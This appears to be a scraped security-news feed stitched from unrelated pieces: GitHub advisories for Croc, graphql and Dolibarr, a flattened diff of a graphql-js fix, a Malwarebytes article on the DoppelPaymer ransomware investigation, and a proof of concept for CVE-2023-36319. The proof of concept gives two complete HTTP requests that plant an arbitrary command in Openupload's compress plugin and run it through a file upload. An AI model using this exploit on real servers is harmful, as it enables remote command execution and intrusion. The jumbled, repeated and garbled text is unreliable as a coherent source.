An issue was discovered in Croc through 9.6.5. The shared secret, located on a command line, can be read by local users who list all processes and their arguments.

**Croc may expose secret to local users**

Moderate severity GitHub Reviewed Published Sep 20, 2023 to the GitHub Advisory Database • Updated Sep 21, 2023

GHSA-7g3v-4ggr-xvjf: Croc may expose secret to local users

Versions of the package graphql from 16.3.0 and before 16.8.1 are vulnerable to Denial of Service (DoS) due to insufficient checks in the OverlappingFieldsCanBeMergedRule.ts file when parsing large queries. This vulnerability allows an attacker to degrade system performance.

**Note:** It was not proven that this vulnerability can crash the process.

**graphql Uncontrolled Resource Consumption vulnerability**

Moderate severity GitHub Reviewed Published Sep 20, 2023 to the GitHub Advisory Database • Updated Sep 21, 2023

GHSA-9pv7-vfvm-6vr7: graphql Uncontrolled Resource Consumption vulnerability

CVE-2023-43621: security - croc: multiple issues in file sharing utility

Versions of the package graphql from 16.3.0 and before 16.8.1 are vulnerable to Denial of Service (DoS) due to insufficient checks in the OverlappingFieldsCanBeMergedRule.ts file when parsing large queries. This vulnerability allows an attacker to degrade system performance.**Note:** It was not proven that this vulnerability can crash the process.

Expand Up @@ -7,8 +7,8 @@ import type { DirectiveNode, FieldNode, FragmentDefinitionNode, ObjectValueNode, SelectionSetNode, ValueNode, } from '../../language/ast.js'; import { Kind } from '../../language/kinds.js'; import { print } from '../../language/printer.js'; Expand Down Expand Up @@ -592,7 +592,7 @@ function findConflict( }  
// Two field calls must have the same arguments. if (stringifyArguments(node1) !== stringifyArguments(node2)) { if (!sameArguments(node1, node2)) { return \[ \[responseName, 'they have differing arguments'\], \[node1\], Expand Down Expand Up @@ -649,19 +649,38 @@ function findConflict( } }  
function stringifyArguments(fieldNode: FieldNode | DirectiveNode): string { // FIXME https://github.com/graphql/graphql-js/issues/2203 const args \= /\* c8 ignore next \*/ fieldNode.arguments ?? \[\];  
const inputObjectWithArgs: ObjectValueNode \= { kind: Kind.OBJECT, fields: args.map((argNode) \=> ({ kind: Kind.OBJECT\_FIELD, name: argNode.name, value: argNode.value, })), }; return print(sortValueNode(inputObjectWithArgs)); function sameArguments( node1: FieldNode | DirectiveNode, node2: FieldNode | DirectiveNode, ): boolean { const args1 \= node1.arguments; const args2 \= node2.arguments;  
if (args1 \=== undefined || args1.length \=== 0) { return args2 \=== undefined || args2.length \=== 0; } if (args2 \=== undefined || args2.length \=== 0) { return false; }  
if (args1.length !== args2.length) { return false; }  
const values2 \= new Map(args2.map(({ name, value }) \=> \[name.value, value\])); return args1.every((arg1) \=> { const value1 \= arg1.value; const value2 \= values2.get(arg1.name.value); if (value2 \=== undefined) { return false; }  
return stringifyValue(value1) \=== stringifyValue(value2); }); }  
function stringifyValue(value: ValueNode): string | null { return print(sortValueNode(value)); }  
function getStreamDirective( Expand All @@ -681,7 +700,7 @@ function sameStreams( return true; } else if (stream1 && stream2) { // check if both fields have equivalent streams return stringifyArguments(stream1) \=== stringifyArguments(stream2); return sameArguments(stream1, stream2); } // fields have a mix of stream and no stream return false; Expand Down

CVE-2023-26144: OverlappingFieldsCanBeMergedRule: Fix performance degradation (#3958) · graphql/graphql-js@f94b511

File Upload vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to execute arbitrary code and obtain sensitive information via the extension filtering and renaming functions.

**File Upload vulnerability in Dolibarr ERP CRM**

Moderate severity GitHub Reviewed Published Sep 20, 2023 to the GitHub Advisory Database • Updated Sep 21, 2023

GHSA-g8h7-mcp6-pf47: File Upload vulnerability in Dolibarr ERP CRM

Cross Site Scripting vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the REST API module, related to analyseVarsForSqlAndScriptsInjection and testSqlAndScriptInject.

**Cross Site Scripting vulnerability in Dolibarr ERP CRM**

Moderate severity GitHub Reviewed Published Sep 20, 2023 to the GitHub Advisory Database • Updated Sep 21, 2023

GHSA-62wf-h26v-5m57: Cross Site Scripting vulnerability in Dolibarr ERP CRM

An issue in Dolibarr ERP CRM v.17.0.1 and before allows a remote privileged attacker to execute arbitrary code via a crafted command/script.

**Dolibarr allows a remote privileged attacker to execute arbitrary code via a crafted command/script**

Moderate severity GitHub Reviewed Published Sep 20, 2023 to the GitHub Advisory Database • Updated Sep 21, 2023

GHSA-6773-rfjv-c54w: Dolibarr allows a remote privileged attacker to execute arbitrary code via a crafted command/script

Categories: News
Categories: Ransomware
More DoppelPaymer ransomware group suspects have been identified by blockchain investigations and had search warrants executed against them.



(Read more...)




The post DoppelPaymer ransomware group suspects identified appeared first on Malwarebytes Labs.

Posted: September 20, 2023 by

The German police in cooperation with the US Secret Service have executed search warrants against suspected members of the DoppelPaymer ransomware group in Germany and Ukraine.

In March of 2023, we reported how the German Regional Police and the Ukrainian National Police, with support from Europol, the Dutch Police, and the United States Federal Bureau of Investigations (FBI), apprehended two suspects and seized computer equipment.

Since then, cybercrime group specialists from the North Rhine-Westphalia State Criminal Police Office (LKA NRW), together with the Cybercrime Central and Contact Point (ZAC NRW), carried out another targeted strike against people associated with the criminal network.

Two men in particular became the focus during blockchain investigations by the LKA NRW and the US Secret Service. They are a 44-year-old Ukrainian who apparently held a key position within the organization and a 45-year-old man from southern Germany who is suspected of having received suspicious funds, possibly originating from ransomware attacks.

Cryptocurrency investigators use specialized strategies to track down criminals. The investigators use tools to collect evidence, trace funds through the blockchain, and try to determine who converted them into fiat currencies. Although cryptocurrency is anonymous, that doesn't mean it's untraceable. All the transactions are recorded on a public ledger, which provides a treasure trove of data to search, analyze, and categorize.

Over the last years, DoppelPaymer claimed responsibility for a high-profile ransomware attack on Kia Motors America. The gang was also responsible for a costly attack on the St. Lucie County sheriffs department, the Dutch Institute for Scientific Research (NWO), and the Illinois Attorney General's office. Other victims attacked by DoppelPaymer in the past include Compal, PEMEX (Petróleos Mexicanos), the City of Torrance in California, Newcastle University, Hall County in Georgia, Banijay Group SAS, and Bretagne Télécom.

Since March of 2021, DoppelPaymer has been missing from our monthly ransomware reviews, and the last known leak site address we had on record for them has been taken offline.

During their active period (2017 - 2021), more than 600 victims worldwide were extorted, some of them up to double-digit millions. The investigations by the German authorities, which have been ongoing since 2020, led to the international public search for Igor Olegovich Turashev and Igor Garshin in March 2023. Both of these suspects are currently on EUROPOL's "Most-Wanted" list. The suspicion against a third person could not be sufficiently substantiated during further investigations, so the public search was withdrawn.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

**RELATED ARTICLES**

DoppelPaymer ransomware group suspects identified

File Upload vulnerability in Openupload Stable v.0.4.3 allows a remote attacker to execute arbitrary code via the action parameter of the compress-inc.php file.

**CVE-2023-36319**

By modifying the compression plug-in command, the attacker can cause the server to execute arbitrary commands during the upload process.

**Only used for authorized security testing, please do not use it for illegal purposes. Violations have nothing to do with the author.**

**Affected version:**

openupload Stable version 0.4.3

**Step one**

Log in to the backend and click on the function: Administration ->Plugins ->compress

Add new “command” directive and save:

    POST /index.php HTTP/1.1
    Host: www.test.com
    Content-Length: 183
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    action=adminpluginsoptions&step=4&id=compress&gid=admins&command=<YOUR CMD>&extension=&compression=
    

**Step two**

Enter the "File upload" function, upload a random file, and ensure "compress=0" in the parameters.

    POST /index.php HTTP/1.1
    Host: www.test.com
    Content-Length: 53
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    action=u&step=3&description=123&emailme=no&compress=0
    

The commands we write will be executed normally.

CVE-2023-36319: GitHub - Lowalu/CVE-2023-36319: exp4CVE-2023-36319

An issue was discovered in ImfHpRegFilter.sys in IOBit Malware Fighter version 8.0.2, allows local attackers to cause a denial of service (DoS).

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Tag

#git